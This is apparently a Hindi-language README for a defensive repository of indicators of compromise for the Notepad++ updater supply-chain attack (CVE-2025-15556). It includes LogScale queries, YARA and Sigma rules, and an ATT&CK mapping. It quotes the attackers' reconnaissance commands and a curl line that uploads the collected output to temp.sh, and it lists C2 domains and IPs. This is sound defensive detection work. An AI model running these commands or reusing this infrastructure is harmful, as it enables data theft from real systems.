
Notepad++ आपूर्ति श्रृंखला हमले (CVE-2025-15556) — Lotus Blossom APT, जून–दिसंबर 2025 के लिए IoCs और डिटेक्शन नियम। इसमें Falcon LogScale क्वेरी, YARA/Sigma नियम और MITRE ATT&CK मैपिंग शामिल है।
CVE-2025-15556 | लोटस ब्लॉसम / रास्पबेरी टाइफून | जून – दिसंबर 2025
इस भंडार में Notepad++ आपूर्ति श्रृंखला हमले (जिसका खुलासा 2 फरवरी, 2026 को हुआ) से संबंधित समझौता संकेतकों (IoCs) का एक व्यापक, एकीकृत संग्रह है।
जून से दिसंबर 2025 के बीच, एक चीनी राज्य-प्रायोजित खतरा अभिनेता ने Notepad++ की होस्टिंग बुनियादी ढांचे से समझौता किया, अंतर्निहित अपडेट तंत्र (WinGUp) को हाईजैक करके लक्षित उपयोगकर्ताओं को चुनिंदा रूप से ट्रोजनाइज्ड इंस्टॉलर वितरित किए। हमले ने अपडेटर (पूर्व-8.8.9) में क्रिप्टोग्राफ़िक सत्यापन की कमी का फायदा उठाया, जिससे कस्टम बैकडोर, Cobalt Strike Beacons और Metasploit पेलोड का वितरण संभव हुआ।
Kaspersky GReAT ने तीन अलग-अलग संक्रमण श्रृंखलाओं की पहचान की, जिन्हें पता लगाने से बचने के लिए लगभग मासिक रूप से घुमाया गया:
GUP.exe → update.exe (NSIS) → ProShow.exe (वैध) → "load" फ़ाइल के माध्यम से शोषण
→ Metasploit डाउनलोडर → Cobalt Strike Beacon
whoami && tasklist → temp.sh के माध्यम से बाहर निकाली गई%appdata%\ProShow\GUP.exe → update.exe (NSIS) → script.exe (Lua दुभाषिया) → alien.ini (संकलित Lua)
→ EnumWindowStationsW के माध्यम से शेलकोड → Metasploit डाउनलोडर → Cobalt Strike Beacon
whoami && tasklist && systeminfo && netstat -ano%appdata%\Adobe\Scripts\GUP.exe → update.exe (NSIS) → BluetoothService.exe (वैध) → log.dll (साइडलोडेड)
→ "BluetoothService" शेलकोड को डिक्रिप्ट करता है → क्रिसालिस बैकडोर
%appdata%\Bluetooth\C:\ProgramData\USOShared\ में पाया गया ┌─────────────────────────────────────────────────────────┐
│ COMPROMISE TIMELINE │
├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
│ Jul 25 │ Aug 25 │ Sep 25 │ Oct 25 │ Nov 25 │Dec 25│
├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
Chain #1 (ProShow) │████████████████████ │
Chain #2 (Lua) │ █████████████████████████████ │
Chain #3 (DLL SL) │ ██████████████ │
Infra access │████████████████████████████████████████████████████████│
└────────────────────────────────────────────────────────┘
| फ़ाइल | विवरण |
|---|---|
notepadpp_supply_chain_iocs.csv | पूर्ण IoC डेटासेट (105 संकेतक) MITRE ATT&CK मैपिंग के साथ |
व्यवहारिक — IoC-अज्ञेय, उच्चतम मूल्य:
gup.exe एक वैध हस्ताक्षरित Notepad++ इंस्टॉलर के अलावा कोई भी चाइल्ड प्रक्रिया बनाता हैgup.exe notepad-plus-plus.org, github.com, release-assets.githubusercontent.com के अलावा अन्य डोमेन/IP से कनेक्ट होता है%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\%localappdata%\Temp\ns.tmp\ का निर्माण (NSIS रनटाइम — सभी श्रृंखलाओं में मौजूद)नेटवर्क — उच्च विश्वास:
cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com का DNS समाधानtemp.sh (51.91.79.17) से कनेक्शन — विशेष रूप से curl के माध्यम से फ़ाइल अपलोड के साथtemp.sh URL एम्बेडेड HTTP अनुरोध45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210 पर आउटबाउंड कनेक्शनटोही कमांड (पोस्ट-एक्सप्लॉइटेशन):
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
// दुर्भावनापूर्ण IP
RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
| iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
// दुर्भावनापूर्ण डोमेन
DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
| iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
// संदिग्ध फ़ाइल नाम
ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
| iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
// संदिग्ध DLL
ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
| iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
// श्रृंखला-विशिष्ट कलाकृतियां
ImageFileName=/\\(alien\.ini|load)$/i
| iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
* | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)
rule Notepadpp_SupplyChain_MaliciousUpdater {
meta:
description = "Detects malicious NSIS installers from Notepad++ supply chain attack"
author = "Renato Z3r0 ed i miei sorcini"
date = "2026-02"
reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
tlp = "WHITE"
strings:
$nsis = "Nullsoft.NSIS" ascii
$recon1 = "whoami" ascii nocase
$recon2 = "tasklist" ascii nocase
$recon3 = "systeminfo" ascii nocase
$recon4 = "netstat -ano" ascii nocase
$exfil = "temp.sh/upload" ascii nocase
$curl = "curl" ascii nocase
$dir1 = "\\ProShow\\" ascii nocase
$dir2 = "\\Adobe\\Scripts\\" ascii nocase
$dir3 = "\\Bluetooth\\" ascii nocase
condition:
uint16(0) == 0x5A4D and
$nsis and
(2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
1 of ($dir*)
}
title: Notepad++ GUP.exe Suspicious Child Process
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects GUP.exe (Notepad++ updater) spawning suspicious child processes indicative of supply chain compromise
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
- https://securelist.com/notepad-supply-chain-attack/118708/
- https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
- attack.initial_access
- attack.t1195.002
- cve.2025.15556
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\gup.exe'
filter_legitimate:
Image|endswith:
- '\npp.Installer.x64.exe'
- '\npp.Installer.exe'
condition: selection_parent and not filter_legitimate
falsepositives:
- Legitimate Notepad++ installers with non-standard naming
level: high
title: Reconnaissance Data Exfiltration via temp.sh
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Detects system reconnaissance followed by data upload to temp.sh, as observed in Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
- https://securelist.com/notepad-supply-chain-attack/118708/
tags:
- attack.exfiltration
- attack.t1567
- attack.discovery
- attack.t1082
logsource:
category: process_creation
product: windows
detection:
selection_curl:
CommandLine|contains:
- 'temp.sh/upload'
- 'temp.sh'
Image|endswith: '\curl.exe'
condition: selection_curl
falsepositives:
- Legitimate use of temp.sh file sharing service (rare in corporate environments)
level: high
title: Notepad++ Supply Chain C2 Domain Resolution
id: c3d4e5f6-a7b8-9012-cdef-123456789012
status: experimental
description: Detects DNS resolution of C2 domains associated with the Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
- https://securelist.com/notepad-supply-chain-attack/118708/
- https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
- attack.command_and_control
- attack.t1071.001
logsource:
category: dns_query
product: windows
detection:
selection:
QueryName|endswith:
- 'cdncheck.it.com'
- 'safe-dns.it.com'
- 'self-dns.it.com'
- 'api.skycloudcenter.com'
- 'api.wiresguard.com'
condition: selection
falsepositives:
- Very unlikely in corporate environments
level: critical
gup.exe के लिए जिसने जून–दिसंबर 2025 के बीच अप्रत्याशित चाइल्ड प्रक्रियाएं शुरू कीं%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\) के लिए| तिथि | परिवर्तन |
|---|---|
| 2026-02-09 | प्रारंभिक रिलीज़ — Kaspersky, Rapid7, CrowdStrike, Tenable से 105 IoCs एकीकृत |
यह भंडार MIT लाइसेंस के तहत प्रदान किया गया है। IoCs केवल रक्षात्मक उद्देश्यों के लिए सार्वजनिक स्रोतों से एकत्र किए गए हैं।
योगदान का स्वागत है। यदि आपके पास अतिरिक्त IoCs, पता लगाने के नियम या सुधार हैं:
अस्वीकरण: यह भंडार केवल रक्षात्मक साइबर सुरक्षा उद्देश्यों के लिए है। IoCs और पता लगाने के नियम संगठनों को इस आपूर्ति श्रृंखला समझौते के प्रति अपने जोखिम का आकलन करने में मदद करने के लिए यथावत प्रदान किए गए हैं।
| CVE | CVE-2025-15556 — अखंडता जांच के बिना कोड का डाउनलोड |
| खतरा अभिनेता | लोटस ब्लॉसम (बिलबग, रास्पबेरी टाइफून, थ्रिप) / जिर्कोनियम (वायलेट टाइफून) |
| सक्रिय अवधि | जून 2025 – 2 दिसंबर, 2025 |
| हमला वेक्टर | WinGUp ऑटो-अपडेटर के माध्यम से आपूर्ति श्रृंखला समझौता |
| लक्ष्य | सरकार, दूरसंचार, वित्तीय सेवाएं, IT प्रदाता (फिलीपींस, वियतनाम, अल साल्वाडोर, ऑस्ट्रेलिया, पूर्वी एशिया) |
| मैलवेयर | क्रिसालिस बैकडोर (कस्टम), Cobalt Strike Beacon, Metasploit Meterpreter |
| पैच किया गया | Notepad++ v8.8.9+ (प्रमाणपत्र सत्यापन) / v8.9.1+ (XMLDSig सत्यापन) |
| कॉलम | विवरण |
|---|
ioc_type | प्रकार: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window |
ioc_value | संकेतक मान |
chain | संक्रमण श्रृंखला (1, 2, 3, 1/2, 2/3, all, n/a) |
context | IoC क्या दर्शाता है, इसका विवरण |
source | खुफिया स्रोत (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont) |
risk | गंभीरता (CRITICAL, HIGH, MEDIUM, LOW, INFO) |
mitre_technique | MITRE ATT&CK तकनीक ID |
| रणनीति | तकनीक | ID | इस अभियान में उपयोग |
|---|
| प्रारंभिक पहुंच | आपूर्ति श्रृंखला समझौता: सॉफ्टवेयर आपूर्ति श्रृंखला से समझौता | T1195.002 | WinGUp अपडेट तंत्र को हाईजैक किया गया |
| निष्पादन | कमांड और स्क्रिप्टिंग दुभाषिया: विंडोज कमांड शेल | T1059.003 | cmd.exe के माध्यम से टोही |
| निष्पादन | कमांड और स्क्रिप्टिंग दुभाषिया: Python/Lua | T1059.006 | श्रृंखला #2 Lua दुभाषिया |
| निष्पादन | क्लाइंट निष्पादन के लिए शोषण | T1203 | श्रृंखला #1 ProShow कमजोरी |
| निष्पादन | मूल API | T1106 | शेलकोड निष्पादन के लिए EnumWindowStationsW |
| स्थायित्व | निष्पादन प्रवाह हाईजैक: DLL साइड-लोडिंग | T1574.002 | श्रृंखला #3 log.dll साइडलोडिंग |
| रक्षा चोरी | अस्पष्ट फ़ाइलें या जानकारी | T1027 | एन्क्रिप्टेड शेलकोड, XOR कुंजी "CRAZY" |
| रक्षा चोरी | छलावरण: वैध नाम से मिलान | T1036.005 | BluetoothService.exe, update.exe, AutoUpdater.exe |
| खोज | सिस्टम सूचना खोज | T1082 | whoami, systeminfo, tasklist, netstat |
| संग्रह | डेटा मंचित: स्थानीय डेटा स्टेजिंग | T1074.001 | टोही आउटपुट .txt फ़ाइलों में सहेजा गया |
| कमांड और नियंत्रण | एप्लिकेशन लेयर प्रोटोकॉल: वेब प्रोटोकॉल | T1071.001 | Cobalt Strike, क्रिसालिस के माध्यम से HTTPS C2 |
| कमांड और नियंत्रण | एन्क्रिप्टेड चैनल | T1573 | CS Beacon एन्क्रिप्टेड कॉन्फ़िगरेशन |
| कमांड और नियंत्रण | इनग्रेस टूल ट्रांसफर | T1105 | Metasploit डाउनलोडर CS Beacon ला रहा है |
| बहिर्गमन | वेब सेवा पर बहिर्गमन | T1567 | temp.sh पर अपलोड |
| स्रोत | लिंक |
|---|
| Kaspersky GReAT — अनजान निष्पादन श्रृंखलाएं और नए IoCs | securelist.com |
| Rapid7 — क्रिसालिस बैकडोर: लोटस ब्लॉसम के टूलकिट में गोता | rapid7.com |
| Notepad++ आधिकारिक खुलासा — हाईजैक की गई घटना की जानकारी अपडेट | notepad-plus-plus.org |
| Kevin Beaumont — प्रारंभिक खुलासा और आरोपण | DoublePulsar |
| Tenable — Notepad++ आपूर्ति श्रृंखला समझौते के बारे में अक्सर पूछे जाने वाले प्रश्न | tenable.com |
| Orca Security — अपडेट हाईजैक विश्लेषण और सुधार | orca.security |
| CSO Online — चीनी APT परिष्कृत आपूर्ति श्रृंखला हमला | csoonline.com |